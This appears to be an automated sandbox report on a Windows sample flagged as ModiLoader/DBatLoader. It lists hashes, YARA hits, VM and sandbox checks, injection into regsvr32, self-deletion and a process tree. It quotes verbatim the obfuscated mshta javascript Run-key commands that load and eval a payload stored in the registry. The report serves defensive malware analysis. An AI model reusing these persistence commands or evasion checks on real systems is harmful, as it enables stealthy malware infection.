Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-11-2024 10:41
Static task
static1
Behavioral task
behavioral1
Sample
850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe
-
Size
477KB
-
MD5
850ba4792b679407a27ec261abc2334f
-
SHA1
1098f2978a2c44451f7c22c9ef2294396ebec970
-
SHA256
9634f5be52d50b75e3d2edb527935c882ec82420faa893085f5dee15a2bb6e21
-
SHA512
49a0f6c2e6d0d2a9b255900e7107c529d228cee920309643ce2f1ac9b99e359afaa6037458bd26e7f87198d21b1c4c2f6f693650b90f622d83552a5b9db868bd
-
SSDEEP
12288:jtca1qBsng2hJ+0v4ajM/InREpCh/XySbkeSbk6kr:X1MsJA/InR8DSgeSg6kr
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
ModiLoader Second Stage 41 IoCs
Processes:
resource yara_rule behavioral1/memory/2100-8-0x0000000000400000-0x000000000047C000-memory.dmp modiloader_stage2 behavioral1/memory/2100-10-0x0000000000050000-0x000000000011C000-memory.dmp modiloader_stage2 behavioral1/memory/2100-13-0x0000000000050000-0x000000000011C000-memory.dmp modiloader_stage2 behavioral1/memory/2100-11-0x0000000000050000-0x000000000011C000-memory.dmp modiloader_stage2 behavioral1/memory/2100-14-0x0000000000050000-0x000000000011C000-memory.dmp modiloader_stage2 behavioral1/memory/2100-12-0x0000000000050000-0x000000000011C000-memory.dmp modiloader_stage2 behavioral1/memory/2100-17-0x0000000000050000-0x000000000011C000-memory.dmp modiloader_stage2 behavioral1/memory/2100-22-0x0000000000400000-0x000000000047C000-memory.dmp modiloader_stage2 behavioral1/memory/1656-26-0x0000000000220000-0x00000000002EC000-memory.dmp modiloader_stage2 behavioral1/memory/1656-29-0x0000000000220000-0x00000000002EC000-memory.dmp modiloader_stage2 behavioral1/memory/1656-28-0x0000000000220000-0x00000000002EC000-memory.dmp modiloader_stage2 behavioral1/memory/1656-27-0x0000000000220000-0x00000000002EC000-memory.dmp modiloader_stage2 behavioral1/memory/1656-25-0x0000000000220000-0x00000000002EC000-memory.dmp modiloader_stage2 behavioral1/memory/1656-30-0x0000000000220000-0x00000000002EC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-40-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-44-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-45-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-43-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-50-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-49-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-52-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-54-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-46-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-53-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-51-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-47-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-42-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-41-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2644-63-0x0000000000150000-0x000000000021C000-memory.dmp modiloader_stage2 behavioral1/memory/2644-62-0x0000000000150000-0x000000000021C000-memory.dmp modiloader_stage2 behavioral1/memory/2644-61-0x0000000000150000-0x000000000021C000-memory.dmp modiloader_stage2 behavioral1/memory/2644-60-0x0000000000150000-0x000000000021C000-memory.dmp modiloader_stage2 behavioral1/memory/2644-59-0x0000000000150000-0x000000000021C000-memory.dmp modiloader_stage2 behavioral1/memory/2644-58-0x0000000000150000-0x000000000021C000-memory.dmp modiloader_stage2 behavioral1/memory/2296-64-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2296-65-0x0000000000230000-0x00000000002FC000-memory.dmp modiloader_stage2 behavioral1/memory/2692-69-0x0000000000270000-0x000000000033C000-memory.dmp modiloader_stage2 behavioral1/memory/2692-73-0x0000000000270000-0x000000000033C000-memory.dmp modiloader_stage2 behavioral1/memory/2692-72-0x0000000000270000-0x000000000033C000-memory.dmp modiloader_stage2 behavioral1/memory/2692-71-0x0000000000270000-0x000000000033C000-memory.dmp modiloader_stage2 behavioral1/memory/2692-70-0x0000000000270000-0x000000000033C000-memory.dmp modiloader_stage2 -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
regsvr32.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:FrgWs1v1yQ=\"7Kv\";N8G=new%20ActiveXObject(\"WScript.Shell\");uLkpu7Df=\"f9CexypUs\";ZJ64PF=N8G.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\572a576bb5\\\\036d5766\");hB0zfm0DGk=\"y5X7h3\";eval(ZJ64PF);cYdqgJ3vh6=\"BJ\";" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run regsvr32.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
Processes:
regsvr32.exepid Process 2296 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
regsvr32.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:w1CChvCeb=\"9rArXr\";E2t1=new%20ActiveXObject(\"WScript.Shell\");fJi1eTQx=\"XW\";kf9qp=E2t1.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\572a576bb5\\\\036d5766\");ljG53PzPk=\"gGpV\";eval(kf9qp);aC2RWj0IF=\"q3E\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:RNSqv23vG=\"YzJT\";u5e9=new%20ActiveXObject(\"WScript.Shell\");Fsn3uyyr=\"HrBs\";tAL0U=u5e9.RegRead(\"HKCU\\\\software\\\\572a576bb5\\\\036d5766\");xoyRKZ51v=\"16qly\";eval(tAL0U);VxPtME7=\"BU3t3eB\";" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
regsvr32.exeregsvr32.exe850ba4792b679407a27ec261abc2334f_JaffaCakes118.exeregsvr32.exeregsvr32.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
Processes:
regsvr32.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepid Process 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
Processes:
850ba4792b679407a27ec261abc2334f_JaffaCakes118.exeregsvr32.exeregsvr32.exepid Process 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 1656 regsvr32.exe 1656 regsvr32.exe 1656 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe 2296 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
850ba4792b679407a27ec261abc2334f_JaffaCakes118.exedescription pid Process Token: SeSecurityPrivilege 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
850ba4792b679407a27ec261abc2334f_JaffaCakes118.exeregsvr32.exeregsvr32.exedescription pid Process procid_target PID 2100 wrote to memory of 1656 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 31 PID 2100 wrote to memory of 1656 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 31 PID 2100 wrote to memory of 1656 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 31 PID 2100 wrote to memory of 1656 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 31 PID 2100 wrote to memory of 1656 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 31 PID 2100 wrote to memory of 1656 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 31 PID 2100 wrote to memory of 1656 2100 850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe 31 PID 1656 wrote to memory of 2296 1656 regsvr32.exe 32 PID 1656 wrote to memory of 2296 1656 regsvr32.exe 32 PID 1656 wrote to memory of 2296 1656 regsvr32.exe 32 PID 1656 wrote to memory of 2296 1656 regsvr32.exe 32 PID 1656 wrote to memory of 2296 1656 regsvr32.exe 32 PID 1656 wrote to memory of 2296 1656 regsvr32.exe 32 PID 1656 wrote to memory of 2296 1656 regsvr32.exe 32 PID 2296 wrote to memory of 2644 2296 regsvr32.exe 33 PID 2296 wrote to memory of 2644 2296 regsvr32.exe 33 PID 2296 wrote to memory of 2644 2296 regsvr32.exe 33 PID 2296 wrote to memory of 2644 2296 regsvr32.exe 33 PID 2296 wrote to memory of 2644 2296 regsvr32.exe 33 PID 2296 wrote to memory of 2644 2296 regsvr32.exe 33 PID 2296 wrote to memory of 2644 2296 regsvr32.exe 33 PID 2296 wrote to memory of 2692 2296 regsvr32.exe 34 PID 2296 wrote to memory of 2692 2296 regsvr32.exe 34 PID 2296 wrote to memory of 2692 2296 regsvr32.exe 34 PID 2296 wrote to memory of 2692 2296 regsvr32.exe 34 PID 2296 wrote to memory of 2692 2296 regsvr32.exe 34 PID 2296 wrote to memory of 2692 2296 regsvr32.exe 34 PID 2296 wrote to memory of 2692 2296 regsvr32.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\850ba4792b679407a27ec261abc2334f_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Adds policy Run key to start application
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Adds Run key to start application
- Maps connected drives based on registry
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2644
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2